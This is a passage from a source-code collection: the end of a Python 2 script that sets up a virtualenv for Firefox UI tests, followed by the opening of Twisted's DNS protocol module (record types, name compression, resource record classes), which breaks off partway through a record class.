            f.extractall(here)

        print 'Creating new virtual environment'
        cmd_args = [sys.executable, script_path, target]

        if python_bin:
            cmd_args.extend(['-p', python_bin])

        subprocess.check_call(cmd_args)
    finally:
        # Best-effort cleanup of the downloaded archive and unpacked sources.
        try:
            os.remove(zip_path)
        except OSError:
            pass

        shutil.rmtree(os.path.dirname(script_path), ignore_errors=True)
def main():
    """Parse command-line options, build the virtualenv, activate it in this
    process, and install the Firefox UI tests (plus optional extras) into it.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-p', '--python',
                        dest='python',
                        metavar='BINARY',
                        help='The Python interpreter to use.')
    parser.add_argument('--with-optional-packages',
                        dest='with_optional',
                        default=False,
                        action='store_true',
                        help='Installs optional packages for enhanced usability.')
    parser.add_argument('venv',
                        metavar='PATH',
                        help='Path to the environment to be created.')
    args = parser.parse_args()

    # Remove an already existent virtual environment
    if os.path.exists(args.venv):
        print 'Removing already existent virtual environment at: %s' % args.venv
        shutil.rmtree(args.venv, True)

    create_virtualenv(args.venv, python_bin=args.python)

    # Activate the environment inside this running process so the `pip`
    # below resolves to the new environment (execfile is Python 2 only).
    tps_env = os.path.join(args.venv, venv_activate_this)
    execfile(tps_env, dict(__file__=tps_env))

    # Install Firefox UI tests, dependencies and optional packages
    command = ['pip', 'install', os.getcwd()]

    if args.with_optional:
        command.extend(['-r', 'optional_packages.txt'])

    print 'Installing Firefox UI Tests and dependencies...'
    print 'Command: %s' % command
    subprocess.check_call(command)

    # Print the user instructions
    print usage_message.format('' if sys.platform == 'win32' else 'source ',
                               os.path.join(args.venv, venv_activate))
# Script entry point.
if __name__ == "__main__":
    main()
| mpl-2.0 |
Senseg/Py4A | python-modules/twisted/twisted/names/dns.py | 49 | 53596 | # -*- test-case-name: twisted.names.test.test_dns -*-
# Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
DNS protocol implementation.
Future Plans:
- Get rid of some toplevels, maybe.
@author: Moshe Zadka
@author: Jean-Paul Calderone
"""
__all__ = [
'IEncodable', 'IRecord',
'A', 'A6', 'AAAA', 'AFSDB', 'CNAME', 'DNAME', 'HINFO',
'MAILA', 'MAILB', 'MB', 'MD', 'MF', 'MG', 'MINFO', 'MR', 'MX',
'NAPTR', 'NS', 'NULL', 'PTR', 'RP', 'SOA', 'SPF', 'SRV', 'TXT', 'WKS',
'ANY', 'CH', 'CS', 'HS', 'IN',
'ALL_RECORDS', 'AXFR', 'IXFR',
'EFORMAT', 'ENAME', 'ENOTIMP', 'EREFUSED', 'ESERVER',
'Record_A', 'Record_A6', 'Record_AAAA', 'Record_AFSDB', 'Record_CNAME',
'Record_DNAME', 'Record_HINFO', 'Record_MB', 'Record_MD', 'Record_MF',
'Record_MG', 'Record_MINFO', 'Record_MR', 'Record_MX', 'Record_NAPTR',
'Record_NS', 'Record_NULL', 'Record_PTR', 'Record_RP', 'Record_SOA',
'Record_SPF', 'Record_SRV', 'Record_TXT', 'Record_WKS',
'QUERY_CLASSES', 'QUERY_TYPES', 'REV_CLASSES', 'REV_TYPES', 'EXT_QUERIES',
'Charstr', 'Message', 'Name', 'Query', 'RRHeader', 'SimpleRecord',
'DNSDatagramProtocol', 'DNSMixin', 'DNSProtocol',
'OK', 'OP_INVERSE', 'OP_NOTIFY', 'OP_QUERY', 'OP_STATUS', 'OP_UPDATE',
'PORT',
'AuthoritativeDomainError', 'DNSQueryTimeoutError', 'DomainError',
]
# System imports
import warnings
import struct, random, types, socket
try:
import cStringIO as StringIO
except ImportError:
import StringIO
AF_INET6 = socket.AF_INET6
from zope.interface import implements, Interface, Attribute
# Twisted imports
from twisted.internet import protocol, defer
from twisted.internet.error import CannotListenError
from twisted.python import log, failure
from twisted.python import util as tputil
from twisted.python import randbytes
def randomSource():
    """
    Wrapper around L{randbytes.secureRandom}: reads 2 cryptographically
    random bytes and unpacks them as one (native-endian) unsigned 16-bit
    integer, suitable for use as a DNS message ID.
    """
    return struct.unpack('H', randbytes.secureRandom(2, fallback=True))[0]
PORT = 53
(A, NS, MD, MF, CNAME, SOA, MB, MG, MR, NULL, WKS, PTR, HINFO, MINFO, MX, TXT,
RP, AFSDB) = range(1, 19)
AAAA = 28
SRV = 33
NAPTR = 35
A6 = 38
DNAME = 39
SPF = 99
QUERY_TYPES = {
A: 'A',
NS: 'NS',
MD: 'MD',
MF: 'MF',
CNAME: 'CNAME',
SOA: 'SOA',
MB: 'MB',
MG: 'MG',
MR: 'MR',
NULL: 'NULL',
WKS: 'WKS',
PTR: 'PTR',
HINFO: 'HINFO',
MINFO: 'MINFO',
MX: 'MX',
TXT: 'TXT',
RP: 'RP',
AFSDB: 'AFSDB',
# 19 through 27? Eh, I'll get to 'em.
AAAA: 'AAAA',
SRV: 'SRV',
NAPTR: 'NAPTR',
A6: 'A6',
DNAME: 'DNAME',
SPF: 'SPF'
}
IXFR, AXFR, MAILB, MAILA, ALL_RECORDS = range(251, 256)
# "Extended" queries (Hey, half of these are deprecated, good job)
EXT_QUERIES = {
IXFR: 'IXFR',
AXFR: 'AXFR',
MAILB: 'MAILB',
MAILA: 'MAILA',
ALL_RECORDS: 'ALL_RECORDS'
}
REV_TYPES = dict([
(v, k) for (k, v) in QUERY_TYPES.items() + EXT_QUERIES.items()
])
IN, CS, CH, HS = range(1, 5)
ANY = 255
QUERY_CLASSES = {
IN: 'IN',
CS: 'CS',
CH: 'CH',
HS: 'HS',
ANY: 'ANY'
}
REV_CLASSES = dict([
(v, k) for (k, v) in QUERY_CLASSES.items()
])
# Opcodes
OP_QUERY, OP_INVERSE, OP_STATUS = range(3)
OP_NOTIFY = 4 # RFC 1996
OP_UPDATE = 5 # RFC 2136
# Response Codes
OK, EFORMAT, ESERVER, ENAME, ENOTIMP, EREFUSED = range(6)
class IRecord(Interface):
    """
    A single entry in a zone of authority.
    """

    # Concrete record classes provide this as their record-type constant.
    TYPE = Attribute("An indicator of what kind of record this is.")
# Backwards compatibility aliases - these should be deprecated or something I
# suppose. -exarkun
from twisted.names.error import DomainError, AuthoritativeDomainError
from twisted.names.error import DNSQueryTimeoutError
def str2time(s):
    """
    Parse a time interval specifier into a number of seconds.

    `s` may be a number, or a string optionally carrying one of the
    (case-insensitive) suffixes S, M, H, D, W or Y (seconds, minutes,
    hours, days, weeks, years), e.g. '2H' -> 7200.  Suffix-less strings
    are converted with int(); non-string values are returned via int(s).

    @raise ValueError: if a suffix-less string is not a valid integer.
    """
    suffixes = (
        ('S', 1), ('M', 60), ('H', 60 * 60), ('D', 60 * 60 * 24),
        ('W', 60 * 60 * 24 * 7), ('Y', 60 * 60 * 24 * 365)
    )
    if isinstance(s, types.StringType):
        s = s.upper().strip()
        for (suff, mult) in suffixes:
            if s.endswith(suff):
                # float() first so values like '1.5H' work.
                return int(float(s[:-1]) * mult)
        try:
            s = int(s)
        except ValueError:
            raise ValueError, "Invalid time interval specifier: " + s
    return s
def readPrecisely(file, l):
    """
    Read exactly C{l} bytes from C{file}.

    @raise EOFError: if fewer than C{l} bytes are available.
    """
    data = file.read(l)
    if len(data) >= l:
        return data
    raise EOFError
class IEncodable(Interface):
    """
    Interface for something which can be encoded to and decoded
    from a file object.
    """

    def encode(strio, compDict = None):
        """
        Write a representation of this object to the given
        file object.

        @type strio: File-like object
        @param strio: The stream to which to write bytes

        @type compDict: C{dict} or C{None}
        @param compDict: A dictionary of backreference addresses that
        have already been written to this stream and that may be used for
        compression.
        """

    def decode(strio, length = None):
        """
        Reconstruct an object from data read from the given
        file object.

        @type strio: File-like object
        @param strio: The stream from which bytes may be read

        @type length: C{int} or C{None}
        @param length: The number of bytes in this RDATA field.  Most
        implementations can ignore this value.  Only in the case of
        records similar to TXT where the total length is in no way
        encoded in the data is it necessary.
        """
class Charstr(object):
    implements(IEncodable)

    def __init__(self, string=''):
        if not isinstance(string, str):
            raise ValueError("%r is not a string" % (string,))
        self.string = string

    def encode(self, strio, compDict=None):
        """
        Write this character string to C{strio} as a single length byte
        followed by the string's bytes.

        @type strio: file
        @param strio: The byte representation of this Charstr will be written
        to this file.
        """
        data = self.string
        strio.write(chr(len(data)))
        strio.write(data)

    def decode(self, strio, length=None):
        """
        Read a length-prefixed character string from C{strio} into this
        object.

        @type strio: file
        @param strio: Bytes will be read from this file until the full string
        is decoded.

        @raise EOFError: Raised when there are not enough bytes available from
        C{strio}.
        """
        # Reset first so a partial read leaves a well-defined (empty) value.
        self.string = ''
        prefix = ord(readPrecisely(strio, 1))
        self.string = readPrecisely(strio, prefix)

    def __eq__(self, other):
        if isinstance(other, Charstr):
            return self.string == other.string
        return False

    def __hash__(self):
        return hash(self.string)

    def __str__(self):
        return self.string
class Name:
    """
    A domain name, with support for RFC 1035 wire-format encoding and
    decoding, including message-compression backreferences.

    @ivar name: The dotted textual form of this domain name.
    @type name: C{str}
    """
    implements(IEncodable)

    def __init__(self, name=''):
        assert isinstance(name, types.StringTypes), "%r is not a string" % (name,)
        self.name = name

    def encode(self, strio, compDict=None):
        """
        Encode this Name into the appropriate byte format.

        @type strio: file
        @param strio: The byte representation of this Name will be written to
            this file.

        @type compDict: dict
        @param compDict: dictionary of Names that have already been encoded
            and whose addresses may be backreferenced by this Name (for the
            purpose of reducing the message size).
        """
        name = self.name
        while name:
            if compDict is not None:
                if name in compDict:
                    # A previously written copy of this suffix exists:
                    # emit a two-byte pointer (top two bits set) to it.
                    strio.write(
                        struct.pack("!H", 0xc000 | compDict[name]))
                    return
                else:
                    compDict[name] = strio.tell() + Message.headerSize
            ind = name.find('.')
            if ind > 0:
                label, name = name[:ind], name[ind + 1:]
            else:
                label, name = name, ''
            ind = len(label)
            strio.write(chr(ind))
            strio.write(label)
        strio.write(chr(0))

    def decode(self, strio, length=None):
        """
        Decode a byte string into this Name.

        @type strio: file
        @param strio: Bytes will be read from this file until the full Name
            is decoded.

        @raise EOFError: Raised when there are not enough bytes available
            from C{strio}.

        @raise ValueError: Raised when the name contains a compression
            pointer loop, which would otherwise make decoding run forever
            on a maliciously crafted message.
        """
        self.name = ''
        off = 0
        # Offsets already jumped to via compression pointers; used to
        # detect pointer cycles in corrupt or hostile messages.
        visited = set()
        while 1:
            l = ord(readPrecisely(strio, 1))
            if l == 0:
                if off > 0:
                    strio.seek(off)
                return
            if (l >> 6) == 3:
                # Top two bits set: a 14-bit compression pointer.
                new_off = ((l&63) << 8
                            | ord(readPrecisely(strio, 1)))
                if new_off in visited:
                    raise ValueError("Compression loop in encoded name")
                visited.add(new_off)
                if off == 0:
                    # Remember where the pointer chain began so the stream
                    # position can be restored when the name is complete.
                    off = strio.tell()
                strio.seek(new_off)
                continue
            label = readPrecisely(strio, l)
            if self.name == '':
                self.name = label
            else:
                self.name = self.name + '.' + label

    def __eq__(self, other):
        if isinstance(other, Name):
            return str(self) == str(other)
        return 0

    def __hash__(self):
        return hash(str(self))

    def __str__(self):
        return self.name
class Query:
    """
    Represent a single DNS query.

    @ivar name: The name about which this query is requesting information.
    @ivar type: The query type.
    @ivar cls: The query class.
    """
    implements(IEncodable)

    name = None
    type = None
    cls = None

    def __init__(self, name='', type=A, cls=IN):
        """
        @type name: C{str}
        @param name: The name about which to request information.

        @type type: C{int}
        @param type: The query type.

        @type cls: C{int}
        @param cls: The query class.
        """
        self.name = Name(name)
        self.type = type
        self.cls = cls

    def encode(self, strio, compDict=None):
        self.name.encode(strio, compDict)
        strio.write(struct.pack("!HH", self.type, self.cls))

    def decode(self, strio, length=None):
        self.name.decode(strio)
        self.type, self.cls = struct.unpack("!HH", readPrecisely(strio, 4))

    def __hash__(self):
        return hash((str(self.name).lower(), self.type, self.cls))

    def __cmp__(self, other):
        if isinstance(other, Query):
            mine = (str(self.name).lower(), self.type, self.cls)
            theirs = (str(other.name).lower(), other.type, other.cls)
            byValue = cmp(mine, theirs)
            if byValue:
                return byValue
        # Fall back to comparing the classes themselves (also covers the
        # equal-value case, where this yields 0 for same-class operands).
        return cmp(self.__class__, other.__class__)

    def __str__(self):
        t = QUERY_TYPES.get(self.type, EXT_QUERIES.get(self.type, 'UNKNOWN (%d)' % self.type))
        c = QUERY_CLASSES.get(self.cls, 'UNKNOWN (%d)' % self.cls)
        return '<Query %s %s %s>' % (self.name, t, c)

    def __repr__(self):
        return 'Query(%r, %r, %r)' % (str(self.name), self.type, self.cls)
class RRHeader(tputil.FancyEqMixin):
    """
    A resource record header.

    @cvar fmt: C{str} specifying the byte format of an RR.
    @ivar name: The name about which this reply contains information.
    @ivar type: The query type of the original request.
    @ivar cls: The query class of the original request.
    @ivar ttl: The time-to-live for this record.
    @ivar payload: An object that implements the IEncodable interface
    @ivar auth: Whether this header is authoritative or not.
    """
    implements(IEncodable)
    compareAttributes = ('name', 'type', 'cls', 'ttl', 'payload', 'auth')
    fmt = "!HHIH"
    name = None
    type = None
    cls = None
    ttl = None
    payload = None
    # Set by decode() from the wire; encode() computes the RDATA length
    # on the fly instead of using this attribute.
    rdlength = None
    cachedResponse = None
    def __init__(self, name='', type=A, cls=IN, ttl=0, payload=None, auth=False):
        """
        @type name: C{str}
        @param name: The name about which this reply contains information.

        @type type: C{int}
        @param type: The query type.

        @type cls: C{int}
        @param cls: The query class.

        @type ttl: C{int}
        @param ttl: Time to live for this record.

        @type payload: An object implementing C{IEncodable}
        @param payload: A Query Type specific data object.
        """
        # A payload whose TYPE disagrees with the header's type would
        # produce an inconsistent record on the wire.
        assert (payload is None) or (payload.TYPE == type)
        self.name = Name(name)
        self.type = type
        self.cls = cls
        self.ttl = ttl
        self.payload = payload
        self.auth = auth
    def encode(self, strio, compDict=None):
        """
        Write the wire form of this header, then the encoded payload,
        to C{strio}.
        """
        self.name.encode(strio, compDict)
        # The final 0 is a placeholder for rdlength; it is patched below
        # once the payload's encoded size is known.
        strio.write(struct.pack(self.fmt, self.type, self.cls, self.ttl, 0))
        if self.payload:
            prefix = strio.tell()
            self.payload.encode(strio, compDict)
            aft = strio.tell()
            # Seek back over the two-byte rdlength placeholder, patch in
            # the actual payload length, then restore the position.
            strio.seek(prefix - 2, 0)
            strio.write(struct.pack('!H', aft - prefix))
            strio.seek(aft, 0)
    def decode(self, strio, length = None):
        """
        Populate this header from its wire form.  The payload itself is
        NOT decoded here; only C{rdlength} is recorded so the caller can
        decode it afterwards (see Message.parseRecords).
        """
        self.name.decode(strio)
        l = struct.calcsize(self.fmt)
        buff = readPrecisely(strio, l)
        r = struct.unpack(self.fmt, buff)
        self.type, self.cls, self.ttl, self.rdlength = r
    def isAuthoritative(self):
        return self.auth
    def __str__(self):
        t = QUERY_TYPES.get(self.type, EXT_QUERIES.get(self.type, 'UNKNOWN (%d)' % self.type))
        c = QUERY_CLASSES.get(self.cls, 'UNKNOWN (%d)' % self.cls)
        return '<RR name=%s type=%s class=%s ttl=%ds auth=%s>' % (self.name, t, c, self.ttl, self.auth and 'True' or 'False')
    __repr__ = __str__
class SimpleRecord(tputil.FancyStrMixin, tputil.FancyEqMixin):
    """
    A Resource Record which consists of a single RFC 1035 domain-name.

    @type name: L{Name}
    @ivar name: The name associated with this record.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.
    """
    implements(IEncodable, IRecord)

    showAttributes = (('name', 'name', '%s'), 'ttl')
    compareAttributes = ('name', 'ttl')
    TYPE = None
    name = None

    def __init__(self, name='', ttl=None):
        self.name = Name(name)
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        # The entire RDATA is just the encoded domain-name.
        self.name.encode(strio, compDict)

    def decode(self, strio, length=None):
        self.name = Name()
        self.name.decode(strio)

    def __hash__(self):
        return hash(self.name)
# Resource record implementations, one class per RR type.
class Record_NS(SimpleRecord):
    """
    An authoritative nameserver.
    """
    # Wire-format record type code; used to select this class when
    # parsing (see Message._recordTypes).
    TYPE = NS
    fancybasename = 'NS'
class Record_MD(SimpleRecord):
    """
    A mail destination.

    This record type is obsolete.

    @see: L{Record_MX}
    """
    # Wire-format record type code, used for parser dispatch.
    TYPE = MD
    fancybasename = 'MD'
class Record_MF(SimpleRecord):
    """
    A mail forwarder.

    This record type is obsolete.

    @see: L{Record_MX}
    """
    # Wire-format record type code, used for parser dispatch.
    TYPE = MF
    fancybasename = 'MF'
class Record_CNAME(SimpleRecord):
    """
    The canonical name for an alias.
    """
    # Wire-format record type code, used for parser dispatch.
    TYPE = CNAME
    fancybasename = 'CNAME'
class Record_MB(SimpleRecord):
    """
    A mailbox domain name.

    This is an experimental record type.
    """
    # Wire-format record type code, used for parser dispatch.
    TYPE = MB
    fancybasename = 'MB'
class Record_MG(SimpleRecord):
    """
    A mail group member.

    This is an experimental record type.
    """
    # Wire-format record type code, used for parser dispatch.
    TYPE = MG
    fancybasename = 'MG'
class Record_MR(SimpleRecord):
    """
    A mail rename domain name.

    This is an experimental record type.
    """
    # Wire-format record type code, used for parser dispatch.
    TYPE = MR
    fancybasename = 'MR'
class Record_PTR(SimpleRecord):
    """
    A domain name pointer.
    """
    # Wire-format record type code, used for parser dispatch.
    TYPE = PTR
    fancybasename = 'PTR'
class Record_DNAME(SimpleRecord):
    """
    A non-terminal DNS name redirection.

    This record type provides the capability to map an entire subtree of the
    DNS name space to another domain.  It differs from the CNAME record which
    maps a single node of the name space.

    @see: U{http://www.faqs.org/rfcs/rfc2672.html}
    @see: U{http://www.faqs.org/rfcs/rfc3363.html}
    """
    # Wire-format record type code, used for parser dispatch.
    TYPE = DNAME
    fancybasename = 'DNAME'
class Record_A(tputil.FancyEqMixin):
    """
    An IPv4 host address.

    @type address: C{str}
    @ivar address: The packed network-order representation of the IPv4 address
        associated with this record.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.
    """
    implements(IEncodable, IRecord)

    compareAttributes = ('address', 'ttl')
    TYPE = A
    address = None

    def __init__(self, address='0.0.0.0', ttl=None):
        # Stored in packed network byte order.
        self.address = socket.inet_aton(address)
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        strio.write(self.address)

    def decode(self, strio, length=None):
        # An A RDATA is always exactly four octets.
        self.address = readPrecisely(strio, 4)

    def __hash__(self):
        return hash(self.address)

    def dottedQuad(self):
        return socket.inet_ntoa(self.address)

    def __str__(self):
        return '<A address=%s ttl=%s>' % (self.dottedQuad(), self.ttl)
    __repr__ = __str__
class Record_SOA(tputil.FancyEqMixin, tputil.FancyStrMixin):
    """
    Marks the start of a zone of authority.

    This record describes parameters which are shared by all records within a
    particular zone.

    @type mname: L{Name}
    @ivar mname: The domain-name of the name server that was the original or
        primary source of data for this zone.

    @type rname: L{Name}
    @ivar rname: A domain-name which specifies the mailbox of the person
        responsible for this zone.

    @type serial: C{int}
    @ivar serial: The unsigned 32 bit version number of the original copy of
        the zone.  Zone transfers preserve this value.  This value wraps and
        should be compared using sequence space arithmetic.

    @type refresh: C{int}
    @ivar refresh: A 32 bit time interval before the zone should be refreshed.

    @type minimum: C{int}
    @ivar minimum: The unsigned 32 bit minimum TTL field that should be
        exported with any RR from this zone.

    @type expire: C{int}
    @ivar expire: A 32 bit time value that specifies the upper limit on the
        time interval that can elapse before the zone is no longer
        authoritative.

    @type retry: C{int}
    @ivar retry: A 32 bit time interval that should elapse before a failed
        refresh should be retried.

    @type ttl: C{int}
    @ivar ttl: The default TTL to use for records served from this zone.
    """
    implements(IEncodable, IRecord)

    fancybasename = 'SOA'
    compareAttributes = ('serial', 'mname', 'rname', 'refresh', 'expire', 'retry', 'minimum', 'ttl')
    showAttributes = (('mname', 'mname', '%s'), ('rname', 'rname', '%s'), 'serial', 'refresh', 'retry', 'expire', 'minimum', 'ttl')
    TYPE = SOA

    def __init__(self, mname='', rname='', serial=0, refresh=0, retry=0, expire=0, minimum=0, ttl=None):
        self.mname = Name(mname)
        self.rname = Name(rname)
        self.serial = str2time(serial)
        self.refresh = str2time(refresh)
        self.retry = str2time(retry)
        self.expire = str2time(expire)
        self.minimum = str2time(minimum)
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        self.mname.encode(strio, compDict)
        self.rname.encode(strio, compDict)
        packed = struct.pack(
            '!LlllL',
            self.serial, self.refresh, self.retry, self.expire,
            self.minimum)
        strio.write(packed)

    def decode(self, strio, length=None):
        self.mname = Name()
        self.rname = Name()
        self.mname.decode(strio)
        self.rname.decode(strio)
        (self.serial, self.refresh, self.retry, self.expire,
         self.minimum) = struct.unpack('!LlllL', readPrecisely(strio, 20))

    def __hash__(self):
        return hash((
            self.serial, self.mname, self.rname,
            self.refresh, self.expire, self.retry
        ))
class Record_NULL(tputil.FancyStrMixin, tputil.FancyEqMixin):
    """
    A null record.

    This is an experimental record type.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.
    """
    implements(IEncodable, IRecord)

    fancybasename = 'NULL'
    showAttributes = compareAttributes = ('payload', 'ttl')
    TYPE = NULL

    def __init__(self, payload=None, ttl=None):
        self.payload = payload
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        # The payload is opaque; write it through unchanged.
        strio.write(self.payload)

    def decode(self, strio, length=None):
        # The whole RDATA (rdlength bytes) is the opaque payload.
        self.payload = readPrecisely(strio, length)

    def __hash__(self):
        return hash(self.payload)
class Record_WKS(tputil.FancyEqMixin, tputil.FancyStrMixin):
    """
    A well known service description.

    This record type is obsolete.  See L{Record_SRV}.

    @type address: C{str}
    @ivar address: The packed network-order representation of the IPv4 address
        associated with this record.

    @type protocol: C{int}
    @ivar protocol: The 8 bit IP protocol number for which this service map is
        relevant.

    @type map: C{str}
    @ivar map: A bitvector indicating the services available at the specified
        address.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.
    """
    implements(IEncodable, IRecord)

    fancybasename = "WKS"
    compareAttributes = ('address', 'protocol', 'map', 'ttl')
    showAttributes = [('_address', 'address', '%s'), 'protocol', 'ttl']
    TYPE = WKS

    # Presentation form of the packed address, used via showAttributes.
    _address = property(lambda self: socket.inet_ntoa(self.address))

    def __init__(self, address='0.0.0.0', protocol=0, map='', ttl=None):
        self.address = socket.inet_aton(address)
        self.protocol = protocol
        self.map = map
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        strio.write(self.address)
        strio.write(struct.pack('!B', self.protocol))
        strio.write(self.map)

    def decode(self, strio, length=None):
        self.address = readPrecisely(strio, 4)
        self.protocol = struct.unpack('!B', readPrecisely(strio, 1))[0]
        # The service bitmap occupies whatever remains of the RDATA
        # after the 4-byte address and 1-byte protocol.
        self.map = readPrecisely(strio, length - 5)

    def __hash__(self):
        return hash((self.address, self.protocol, self.map))
class Record_AAAA(tputil.FancyEqMixin, tputil.FancyStrMixin):
    """
    An IPv6 host address.

    @type address: C{str}
    @ivar address: The packed network-order representation of the IPv6 address
        associated with this record.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.

    @see: U{http://www.faqs.org/rfcs/rfc1886.html}
    """
    implements(IEncodable, IRecord)

    TYPE = AAAA
    fancybasename = 'AAAA'
    showAttributes = (('_address', 'address', '%s'), 'ttl')
    compareAttributes = ('address', 'ttl')

    # Presentation form of the packed address, used via showAttributes.
    _address = property(lambda self: socket.inet_ntop(AF_INET6, self.address))

    def __init__(self, address='::', ttl=None):
        self.address = socket.inet_pton(AF_INET6, address)
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        strio.write(self.address)

    def decode(self, strio, length=None):
        # An AAAA RDATA is always exactly sixteen octets.
        self.address = readPrecisely(strio, 16)

    def __hash__(self):
        return hash(self.address)
class Record_A6(tputil.FancyStrMixin, tputil.FancyEqMixin):
    """
    An IPv6 address.

    This is an experimental record type.

    @type prefixLen: C{int}
    @ivar prefixLen: The length of the suffix.

    @type suffix: C{str}
    @ivar suffix: An IPv6 address suffix in network order.

    @type prefix: L{Name}
    @ivar prefix: If specified, a name which will be used as a prefix for other
        A6 records.

    @type bytes: C{int}
    @ivar bytes: The length of the prefix.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.

    @see: U{http://www.faqs.org/rfcs/rfc2874.html}
    @see: U{http://www.faqs.org/rfcs/rfc3363.html}
    @see: U{http://www.faqs.org/rfcs/rfc3364.html}
    """
    implements(IEncodable, IRecord)
    TYPE = A6
    fancybasename = 'A6'
    showAttributes = (('_suffix', 'suffix', '%s'), ('prefix', 'prefix', '%s'), 'ttl')
    compareAttributes = ('prefixLen', 'prefix', 'suffix', 'ttl')
    # Presentation form of the packed suffix, used via showAttributes.
    _suffix = property(lambda self: socket.inet_ntop(AF_INET6, self.suffix))
    def __init__(self, prefixLen=0, suffix='::', prefix='', ttl=None):
        self.prefixLen = prefixLen
        self.suffix = socket.inet_pton(AF_INET6, suffix)
        self.prefix = Name(prefix)
        # Number of suffix octets carried on the wire: the part of the
        # 128-bit address not covered by the prefix.
        self.bytes = int((128 - self.prefixLen) / 8.0)
        self.ttl = str2time(ttl)
    def encode(self, strio, compDict = None):
        strio.write(struct.pack('!B', self.prefixLen))
        if self.bytes:
            strio.write(self.suffix[-self.bytes:])
        if self.prefixLen:
            # This may not be compressed
            self.prefix.encode(strio, None)
    def decode(self, strio, length = None):
        self.prefixLen = struct.unpack('!B', readPrecisely(strio, 1))[0]
        self.bytes = int((128 - self.prefixLen) / 8.0)
        if self.bytes:
            # Left-pad with zero octets so suffix is always 16 bytes.
            self.suffix = '\x00' * (16 - self.bytes) + readPrecisely(strio, self.bytes)
        if self.prefixLen:
            self.prefix.decode(strio)
    def __eq__(self, other):
        # NOTE(review): when prefixLen == 128, self.bytes is 0 and
        # suffix[-0:] is the WHOLE suffix, so two records that encode
        # identically (no suffix octets on the wire) can still compare
        # unequal here and hash differently below -- confirm whether
        # this is intended.
        if isinstance(other, Record_A6):
            return (self.prefixLen == other.prefixLen and
                    self.suffix[-self.bytes:] == other.suffix[-self.bytes:] and
                    self.prefix == other.prefix and
                    self.ttl == other.ttl)
        return NotImplemented
    def __hash__(self):
        return hash((self.prefixLen, self.suffix[-self.bytes:], self.prefix))
    def __str__(self):
        return '<A6 %s %s (%d) ttl=%s>' % (
            self.prefix,
            socket.inet_ntop(AF_INET6, self.suffix),
            self.prefixLen, self.ttl
        )
class Record_SRV(tputil.FancyEqMixin, tputil.FancyStrMixin):
    """
    The location of the server(s) for a specific protocol and domain.

    This is an experimental record type.

    @type priority: C{int}
    @ivar priority: The priority of this target host.  A client MUST attempt
        to contact the target host with the lowest-numbered priority it can
        reach; target hosts with the same priority SHOULD be tried in an
        order defined by the weight field.

    @type weight: C{int}
    @ivar weight: Specifies a relative weight for entries with the same
        priority.  Larger weights SHOULD be given a proportionately higher
        probability of being selected.

    @type port: C{int}
    @ivar port: The port on this target host of this service.

    @type target: L{Name}
    @ivar target: The domain name of the target host.  There MUST be one or
        more address records for this name, the name MUST NOT be an alias (in
        the sense of RFC 1034 or RFC 2181).  Implementors are urged, but not
        required, to return the address record(s) in the Additional Data
        section.  Unless and until permitted by future standards action, name
        compression is not to be used for this field.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.

    @see: U{http://www.faqs.org/rfcs/rfc2782.html}
    """
    implements(IEncodable, IRecord)

    TYPE = SRV
    fancybasename = 'SRV'
    compareAttributes = ('priority', 'weight', 'target', 'port', 'ttl')
    showAttributes = ('priority', 'weight', ('target', 'target', '%s'), 'port', 'ttl')

    def __init__(self, priority=0, weight=0, port=0, target='', ttl=None):
        self.priority = int(priority)
        self.weight = int(weight)
        self.port = int(port)
        self.target = Name(target)
        self.ttl = str2time(ttl)

    def encode(self, strio, compDict=None):
        strio.write(struct.pack('!HHH', self.priority, self.weight, self.port))
        # Name compression is not permitted for the target field.
        self.target.encode(strio, None)

    def decode(self, strio, length=None):
        fixed = readPrecisely(strio, struct.calcsize('!HHH'))
        self.priority, self.weight, self.port = struct.unpack('!HHH', fixed)
        self.target = Name()
        self.target.decode(strio)

    def __hash__(self):
        return hash((self.priority, self.weight, self.port, self.target))
class Record_NAPTR(tputil.FancyEqMixin, tputil.FancyStrMixin):
    """
    The location of the server(s) for a specific protocol and domain.

    @type order: C{int}
    @ivar order: An integer specifying the order in which the NAPTR records
        MUST be processed to ensure the correct ordering of rules.  Low
        numbers are processed before high numbers.

    @type preference: C{int}
    @ivar preference: An integer that specifies the order in which NAPTR
        records with equal "order" values SHOULD be processed, low numbers
        being processed before high numbers.

    @type flag: L{Charstr}
    @ivar flag: A <character-string> containing flags to control aspects of
        the rewriting and interpretation of the fields in the record.  Flags
        are single characters from the set [A-Z0-9].  The case of the
        alphabetic characters is not significant.
        At this time only four flags, "S", "A", "U", and "P", are defined.

    @type service: L{Charstr}
    @ivar service: Specifies the service(s) available down this rewrite path.
        It may also specify the particular protocol that is used to talk with
        a service.  A protocol MUST be specified if the flags field states
        that the NAPTR is terminal.

    @type regexp: L{Charstr}
    @ivar regexp: A STRING containing a substitution expression that is
        applied to the original string held by the client in order to
        construct the next domain name to lookup.

    @type replacement: L{Name}
    @ivar replacement: The next NAME to query for NAPTR, SRV, or address
        records depending on the value of the flags field.  This MUST be a
        fully qualified domain-name.

    @type ttl: C{int}
    @ivar ttl: The maximum number of seconds which this record should be
        cached.

    @see: U{http://www.faqs.org/rfcs/rfc2915.html}
    """
    implements(IEncodable, IRecord)
    TYPE = NAPTR
    compareAttributes = ('order', 'preference', 'flags', 'service', 'regexp',
                         'replacement')
    fancybasename = 'NAPTR'
    showAttributes = ('order', 'preference', ('flags', 'flags', '%s'),
                      ('service', 'service', '%s'), ('regexp', 'regexp', '%s'),
                      ('replacement', 'replacement', '%s'), 'ttl')
    def __init__(self, order=0, preference=0, flags='', service='', regexp='',
                 replacement='', ttl=None):
        self.order = int(order)
        self.preference = int(preference)
        self.flags = Charstr(flags)
        self.service = Charstr(service)
